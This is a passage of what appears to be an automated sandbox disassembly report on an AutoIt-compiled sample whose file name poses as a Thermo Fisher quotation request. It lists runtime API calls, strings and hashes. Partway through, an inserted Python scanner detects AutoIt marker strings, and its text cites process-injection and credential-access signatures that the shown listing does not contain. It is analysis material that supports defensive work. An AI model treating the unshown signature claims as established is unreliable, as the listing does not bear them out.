                                                              • GetSystemMetrics.USER32(00000004), ref: 0061A999
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0061A9B6
                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0061A9C6
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0061A9F9
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0061AA0D
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 0061AA2B
                                                              • GetStockObject.GDI32(00000011), ref: 0061AA47
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0061AA52
                                                                • Part of subcall function 0061B63C: GetCursorPos.USER32(000000FF), ref: 0061B64F
                                                                • Part of subcall function 0061B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0061B66C
                                                                • Part of subcall function 0061B63C: GetAsyncKeyState.USER32(00000001), ref: 0061B691
                                                                • Part of subcall function 0061B63C: GetAsyncKeyState.USER32(00000002), ref: 0061B69F
                                                              • SetTimer.USER32(00000000,00000000,00000028,0061AB87), ref: 0061AA79
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: 7b0e472805ae5ee7d118dc6d5bc9fdb6c987a7c4a15759bfa393a526d8cef9af
                                                              • Instruction ID: f07c299d0b567f5b6996949695cbce365947f6c89a1af56c22b9c2e886724525
                                                              • Opcode Fuzzy Hash: 7b0e472805ae5ee7d118dc6d5bc9fdb6c987a7c4a15759bfa393a526d8cef9af
                                                              • Instruction Fuzzy Hash: 45B16A71A0020AAFDB14DFA8CC45BEE7BB6FF09314F154219FA15AA2D0DB74E891CB51
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00663735
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0069DC00,00000000,?,00000000,?,?), ref: 006637A3
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006637EB
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00663874
                                                              • RegCloseKey.ADVAPI32(?), ref: 00663B94
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00663BA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 536824911-966354055
                                                              • Opcode ID: 0f815ca37179aa6a4d53e5688fa84ab526e0a359102faf826c0be729acd30834
                                                              • Instruction ID: d63b695e9170c4804661e0943b51f01a8c7ca0df3524e7d8f3aa058eccbb0828
                                                              • Opcode Fuzzy Hash: 0f815ca37179aa6a4d53e5688fa84ab526e0a359102faf826c0be729acd30834
                                                              • Instruction Fuzzy Hash: 97027E752006119FCB58DF14C851A6AB7E6FF88720F04855DF98A9B3A2DB30ED41CF95
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00666C56
                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00666D16
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                              • API String ID: 3974292440-719923060
                                                              • Opcode ID: 71373f35e05e8f8237e3e93286ec1e8f5b378ca8e85894e72a459fdbfb4844ec
                                                              • Instruction ID: f9eb2ebe232c5c4e4f2a9f625524a15877daf7b7a29393651c94a3e7d506bbf8
                                                              • Opcode Fuzzy Hash: 71373f35e05e8f8237e3e93286ec1e8f5b378ca8e85894e72a459fdbfb4844ec
                                                              • Instruction Fuzzy Hash: 1BA190702042429FCB58EF20D851AAAB7A7BF54310F14496CB9A65B3D2DF31ED46CB85
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0063CF91
                                                              • __swprintf.LIBCMT ref: 0063D032
                                                              • _wcscmp.LIBCMT ref: 0063D045
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0063D09A
                                                              • _wcscmp.LIBCMT ref: 0063D0D6
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0063D10D
                                                              • GetDlgCtrlID.USER32(?), ref: 0063D15F
                                                              • GetWindowRect.USER32(?,?), ref: 0063D195
                                                              • GetParent.USER32(?), ref: 0063D1B3
                                                              • ScreenToClient.USER32(00000000), ref: 0063D1BA
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0063D234
                                                              • _wcscmp.LIBCMT ref: 0063D248
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0063D26E
                                                              • _wcscmp.LIBCMT ref: 0063D282
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                              • String ID: %s%u
                                                              • API String ID: 3119225716-679674701
                                                              • Opcode ID: 1503dbe9a6825a4685fbc130903cb70ab884340dcb5f3c64c7a8e4ded77e3fa0
                                                              • Instruction ID: 7d1f02d068c9f68bad6d5302f7accd1f3be3ff569f600935e6bcf790d962a474
                                                              • Opcode Fuzzy Hash: 1503dbe9a6825a4685fbc130903cb70ab884340dcb5f3c64c7a8e4ded77e3fa0
                                                              • Instruction Fuzzy Hash: 3DA1D071604706AFC714DF64D884FEBB7AAFF44310F008619FA5992280DB30EA45CBE1
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0063D8EB
                                                              • _wcscmp.LIBCMT ref: 0063D8FC
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0063D924
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0063D941
                                                              • _wcscmp.LIBCMT ref: 0063D95F
                                                              • _wcsstr.LIBCMT ref: 0063D970
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0063D9A8
                                                              • _wcscmp.LIBCMT ref: 0063D9B8
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0063D9DF
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0063DA28
                                                              • _wcscmp.LIBCMT ref: 0063DA38
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0063DA60
                                                              • GetWindowRect.USER32(00000004,?), ref: 0063DAC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                              • String ID: @$ThumbnailClass
                                                              • API String ID: 1788623398-1539354611
                                                              • Opcode ID: e7a041cfc8526e0064660b75d08ad1d5706b42a5dbdba3b56e550ad6ab004fc8
                                                              • Instruction ID: ed0613668f6a070484d1ebcb03e12ce8e723b38680ac7c7acab3cdda76bb37ef
                                                              • Opcode Fuzzy Hash: e7a041cfc8526e0064660b75d08ad1d5706b42a5dbdba3b56e550ad6ab004fc8
                                                              • Instruction Fuzzy Hash: DF81BF710083059BDB05DF10E985FAA7BEAEF84314F04856AFD8A9A1D6DB30DD45CBE1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                              • API String ID: 1038674560-1810252412
                                                              • Opcode ID: a50ba9178d177449004b66d403101d9b8b80039bc6560c33a61d4fd017dca253
                                                              • Instruction ID: 36e6f37b68f55b9d6967e59e29e161274dcf8495bad2804b46a0184c81b31706
                                                              • Opcode Fuzzy Hash: a50ba9178d177449004b66d403101d9b8b80039bc6560c33a61d4fd017dca253
                                                              • Instruction Fuzzy Hash: A731C171684206A6DB58FB50ED63EEEB3B79F20754F21012DF402710D1EF61AE54CB99
                                                              APIs
                                                              • LoadIconW.USER32(00000063), ref: 0063EAB0
                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0063EAC2
                                                              • SetWindowTextW.USER32(?,?), ref: 0063EAD9
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0063EAEE
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0063EAF4
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0063EB04
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0063EB0A
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0063EB2B
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0063EB45
                                                              • GetWindowRect.USER32(?,?), ref: 0063EB4E
                                                              • SetWindowTextW.USER32(?,?), ref: 0063EBB9
                                                              • GetDesktopWindow.USER32 ref: 0063EBBF
                                                              • GetWindowRect.USER32(00000000), ref: 0063EBC6
                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0063EC12
                                                              • GetClientRect.USER32(?,?), ref: 0063EC1F
                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0063EC44
                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0063EC6F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                              • String ID:
                                                              • API String ID: 3869813825-0
                                                              • Opcode ID: 58540b8a029b7ac7d2c92eec1d1c83d4720e7f41e6c4a581c67d24e0b2097118
                                                              • Instruction ID: cf3aaefdf124c08a1d6707777960c7468f56c6785b0229ba171537a539ee6915
                                                              • Opcode Fuzzy Hash: 58540b8a029b7ac7d2c92eec1d1c83d4720e7f41e6c4a581c67d24e0b2097118
                                                              • Instruction Fuzzy Hash: E5512071900709EFDB219FA8CE85FAEBBF6FF04704F004618E596A26E0D775A945CB60
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 006579C6
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 006579D1
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 006579DC
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 006579E7
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 006579F2
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 006579FD
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00657A08
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00657A13
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00657A1E
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00657A29
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00657A34
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00657A3F
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00657A4A
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00657A55
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00657A60
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00657A6B
                                                              • GetCursorInfo.USER32(?), ref: 00657A7B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$Info
                                                              • String ID:
                                                              • API String ID: 2577412497-0
                                                              • Opcode ID: 0e6d260f9ea54fad4cc28d7241d3cfb877fd12eea90cff8d39f47a76becfdeef
                                                              • Instruction ID: 3401ab6b168dbc5999f395f3c76801c3f2d4be64aac61f0fffe9330eee8acdba
                                                              • Opcode Fuzzy Hash: 0e6d260f9ea54fad4cc28d7241d3cfb877fd12eea90cff8d39f47a76becfdeef
                                                              • Instruction Fuzzy Hash: C83138B0D0831A6ADF509FB69C8999FBFE9FF04750F50452AE50DE7280DA78A5048FA1
                                                              APIs
                                                                • Part of subcall function 0061E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0060C8B7,?,00002000,?,?,00000000,?,0060419E,?,?,?,0069DC00), ref: 0061E984
                                                                • Part of subcall function 0060660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006053B1,?,?,006061FF,?,00000000,00000001,00000000), ref: 0060662F
                                                              • __wsplitpath.LIBCMT ref: 0060C93E
                                                                • Part of subcall function 00621DFC: __wsplitpath_helper.LIBCMT ref: 00621E3C
                                                              • _wcscpy.LIBCMT ref: 0060C953
                                                              • _wcscat.LIBCMT ref: 0060C968
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0060C978
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0060CABE
                                                                • Part of subcall function 0060B337: _wcscpy.LIBCMT ref: 0060B36F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 2258743419-1018226102
                                                              • Opcode ID: c0043190ea620237e493b288348577a90e8f634760decd01bb0dce1a67cd0a32
                                                              • Instruction ID: 5afdeb7ecc9707a9f055cb51b0fa36b0e7410a809c085e30ff013b8383799cfc
                                                              • Opcode Fuzzy Hash: c0043190ea620237e493b288348577a90e8f634760decd01bb0dce1a67cd0a32
                                                              • Instruction Fuzzy Hash: 9412DE711483419FC768EF24C881AAFBBE6BF88310F40491EF589933A1DB30DA49DB56
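The string table of the function above (">>>AUTOIT SCRIPT<<<", "AU3!", "EA06", the "#include depth exceeded" and "Unterminated string" parser errors) together with the "AutoIt v3 GUI" window class listed in the GUI function earlier in this listing is the kind of static evidence an analyst can check for without the sandbox: these strings are hard-coded in the AutoIt 3 runtime, so finding them in a PE says the file carries that runtime (a plain interpreter or a compiled-script stub). The scanner below is an added example written for this page; it is not code from the Joe Sandbox report or from the AutoIt project. It assumes that "AU3!" and "EA06" are compared as one contiguous tag "AU3!EA06" (the report shows only the two fragments), and, because the report does not show how each string is encoded in the binary, it searches for both the ASCII and the UTF-16LE form of every marker. The sample buffer is constructed for the example, not taken from the analysed file.

```python
"""Find AutoIt 3 runtime marker strings in a PE image (added triage example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Markers taken from the report's string IDs. Joining "AU3!" and "EA06"
# into one tag is this example's assumption; the report lists them apart.
MARKERS: Dict[str, bytes] = {
    "script_marker": b">>>AUTOIT SCRIPT<<<",
    "au3_header_tag": b"AU3!EA06",
    "gui_window_class": b"AutoIt v3 GUI",
}


@dataclass
class MarkerScan:
    """Offsets of every marker that was found, keyed by the names in MARKERS."""
    hits: Dict[str, List[int]] = field(default_factory=dict)

    @property
    def looks_like_autoit_runtime(self) -> bool:
        # Either the script marker or the header tag is enough: both are
        # hard-coded in the interpreter, so a match means the PE carries the
        # AutoIt 3 runtime. It does not say whether a script is embedded.
        return bool(self.hits.get("script_marker") or self.hits.get("au3_header_tag"))


def _find_all(data: bytes, needle: bytes) -> List[int]:
    """Return every byte offset at which needle occurs in data."""
    return [m.start() for m in re.finditer(re.escape(needle), data)]


def scan_autoit_markers(data: bytes) -> MarkerScan:
    """Search data for each marker in both ASCII and UTF-16LE encodings.

    The report shows the decoded strings only, so the encoding used in the
    binary is not known here; searching both forms avoids guessing per string.
    """
    scan = MarkerScan()
    for name, ascii_form in MARKERS.items():
        wide_form = ascii_form.decode("ascii").encode("utf-16-le")
        offsets = _find_all(data, ascii_form) + _find_all(data, wide_form)
        if offsets:
            scan.hits[name] = sorted(offsets)
    return scan


def scan_file(path: str) -> MarkerScan:
    """Convenience wrapper: scan a file on disk."""
    with open(path, "rb") as fh:
        return scan_autoit_markers(fh.read())


# Constructed sample buffer (not the analysed sample): filler bytes with the
# markers planted at known offsets so the scanner's output can be checked.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + "AutoIt v3 GUI".encode("utf-16-le")   # wide string at offset 64
    + b"\x00" * 8
    + b"AU3!EA06"                             # header tag at offset 98
    + b"\x00" * 6
    + b">>>AUTOIT SCRIPT<<<"                  # script marker at offset 112
    + b"\x00" * 16
)

if __name__ == "__main__":
    result = scan_autoit_markers(SAMPLE)
    for name, offsets in result.hits.items():
        print(f"{name}: {[hex(o) for o in offsets]}")
    print("AutoIt 3 runtime markers present:", result.looks_like_autoit_runtime)
```

Run it against a file with `scan_file(path)`. Two caveats apply. A hit identifies the runtime, not the payload: recovering the embedded script is a separate step. And a packed or string-encrypted stub hides these markers entirely, so their absence proves nothing; the report's behavioural signatures (process injection, credential access) remain the stronger evidence.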
                                                              APIs
                                                              • _memset.LIBCMT ref: 0066CEFB
                                                              • DestroyWindow.USER32(?,?), ref: 0066CF73
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0066CFF4
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0066D016
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066D025
                                                              • DestroyWindow.USER32(?), ref: 0066D042
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00600000,00000000), ref: 0066D075
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066D094
                                                              • GetDesktopWindow.USER32 ref: 0066D0A9
                                                              • GetWindowRect.USER32(00000000), ref: 0066D0B0
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0066D0C2
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0066D0DA
                                                                • Part of subcall function 0061B526: GetWindowLongW.USER32(?,000000EB), ref: 0061B537
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 3877571568-3619404913
                                                              • Opcode ID: 2dc8e5ee22adba3a1840f078d83b7172838fa9f3c54bc21749688ef03fcf5faa
                                                              • Instruction ID: fb3183a3f32bcfc0339d14b63f7eefca3e412e1e150498734890a4fe57a233ce
                                                              • Opcode Fuzzy Hash: 2dc8e5ee22adba3a1840f078d83b7172838fa9f3c54bc21749688ef03fcf5faa
                                                              • Instruction Fuzzy Hash: 81719C70640245AFD724CF28CC85FB677E6EB89708F04461DF9858B3A1D771E942CB62
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • DragQueryPoint.SHELL32(?,?), ref: 0066F37A
                                                                • Part of subcall function 0066D7DE: ClientToScreen.USER32(?,?), ref: 0066D807
                                                                • Part of subcall function 0066D7DE: GetWindowRect.USER32(?,?), ref: 0066D87D
                                                                • Part of subcall function 0066D7DE: PtInRect.USER32(?,?,0066ED5A), ref: 0066D88D
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0066F3E3
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0066F3EE
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0066F411
                                                              • _wcscat.LIBCMT ref: 0066F441
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0066F458
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0066F471
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0066F488
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0066F4AA
                                                              • DragFinish.SHELL32(?), ref: 0066F4B1
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0066F59C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                              • API String ID: 169749273-3440237614
                                                              • Opcode ID: 79ae7cc52dacf0d6fe9f7c463721b10f210565f60e6cc48013becac98113893c
                                                              • Instruction ID: 087214d33d7495f4c7263349c5f6c9a858a55fbba6b6e32dfa47f2c07fcb3402
                                                              • Opcode Fuzzy Hash: 79ae7cc52dacf0d6fe9f7c463721b10f210565f60e6cc48013becac98113893c
                                                              • Instruction Fuzzy Hash: 0A615CB1108304AFC305EF64DC45DAFBBFAEF89710F000A1EF595921A1DB709A49CB62
                                                              APIs
